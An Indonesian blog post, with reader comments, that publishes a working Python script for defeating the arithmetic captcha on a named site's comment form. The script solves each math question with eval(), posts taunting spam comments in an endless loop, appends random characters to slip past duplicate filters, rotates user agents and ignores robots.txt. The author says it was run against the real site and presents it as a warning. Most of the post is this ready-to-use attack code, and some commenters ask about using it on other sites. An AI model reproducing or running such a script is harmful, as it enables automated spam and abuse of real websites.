break a time, with break the c0de…

virusindonesia.com captcha broke


yah, tadi awalnya cuma iseng
ngeliat virus yang dibuat sama temen
bisa dilihat disini :
http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/

berhubungan saya lagi banyak bereksperimen tentang captcha
sekaligus saya hanya ingin mengingatkan bahwa captcha tersebut tidak baik
mengingat bahwa captcha tersebut dapat di kalahkan dengan metode simulasi

berikut sourcecode dari program…

#!/usr/bin/python
import mechanize, cookielib, re, time, random
randstring	= ['a','b','c','d','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
		   'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
		   '1','2','3','4','5','6','7','8','9','0'
		  ]
header = {
          "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Language": "en-us,en;q=0.5",
          "Accept-Encoding": "gzip,deflate",
          "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
          "Keep-Alive": "99999",
          "Proxy-Connection": "keep-alive",
          "Content-Type": "application/x-www-form-urlencoded"
}
ouruseragent 	= ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
		'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
        	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
        	'Microsoft Internet Explorer/4.0b1 (Windows 95)',
        	'Opera/8.00 (Windows NT 5.1; U; en)',
		'amaya/9.51 libwww/5.4.0',
		'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
		'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
		'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
		
br = mechanize.Browser()
# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Want debugging messages ??
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
# try to cheating
br.addheaders = [('User-agent', random.choice(ouruseragent))]

def main():
	'''infinite loop'''
	while 1:
		print "[*] Going to virusindonesia.com"
		page = br.open("http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/")
		read = page.read()
		captcha = re.findall("<strong>Hasil dari (.*) ?</strong>",read)
		captchaclean = captcha[0]
		captchaclean = captchaclean.replace(" ?","")
		print "[*] Got question   : %s " % captchaclean
		result = eval(''.join([str(x) for x in captchaclean])) # we give her to thinking some math ;)
		print "[*] Program answer : %d " % int(result)
		br.select_form(nr=1)
		br.form['author'] = 'rise of robot !!!'
		br.form['email'] = 'yudha.gunslinger@gmail[dot]com'
		br.form['url'] = 'http://gunslingerc0de.wordpress[dot]com'
		br.form['mcspvalue'] = str(result)
		br.form['comment'] = '''
		RISE OF ROBOT !!
		
		YOUR CAPTCHA DEFEATED !!
		PLEASE PATCH !!
		https://gunslingerc0de.wordpress.com
		%s%s%s
		''' % (str(random.choice(randstring)), str(random.choice(randstring)), str(random.choice(randstring))) # prevent blocking by string checker ;)
		br.submit()
		# print br.response().read()
		print "[*] Spammed successfully..."
		time.sleep(1)
		print "[*] Sleeping for 30 seconds please wait"
		time.sleep(30) # prevent blocking too, so wee need time.sleep() ;)... or we got forbidden status ;)
		print "[*] Ready to rock baby..."
		
if __name__ == '__main__':
	main()

ketika saya telah mengingatkan dengan beberapa spam, beberapa menit kemudian sudah di hapus oleh virusindonesia sendiri (well good job quick responds)
dengan ini saya harap situs tersebut mau mengganti captchanya agar tidak terspamming oleh yang lain ;)

Advertisements

10 responses

  1. Keren mas… logikanya

    September 4, 2010 at 9:04 am

  2. wakakkaaka…. kereen mas…
    coba belum dihapus…. padahal ane pengen lihat…

    September 4, 2010 at 9:37 am

  3. one-day

    Error :

    print “[*] Going to virusindonesia.com”
    ^
    SyntaxError: invalid syntax

    September 4, 2010 at 12:36 pm

    • don’t blind copy paste, view source first

      September 5, 2010 at 3:18 am

      • sip gan!

        September 8, 2010 at 3:50 am

  4. Mantaaaaaaaaaap :D

    tu kan keren2 project2nya ckckkc

    RISE of Robot :D

    September 6, 2010 at 1:01 pm

  5. tasuda

    Om ane rei , mw tanay donk cara buwt

    itu di wordpress.com gmna yah caranya..?
    minta caranya donk..^^

    September 10, 2010 at 10:08 am

  6. om guns ajarin phyton dong :D

    September 14, 2010 at 2:46 pm

  7. itu bisa di web laen kaga?

    September 15, 2010 at 3:17 pm

  8. Pingback: Wasssuuuw!-virusindonesia.com captcha broke | Asu & Celeng ™

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s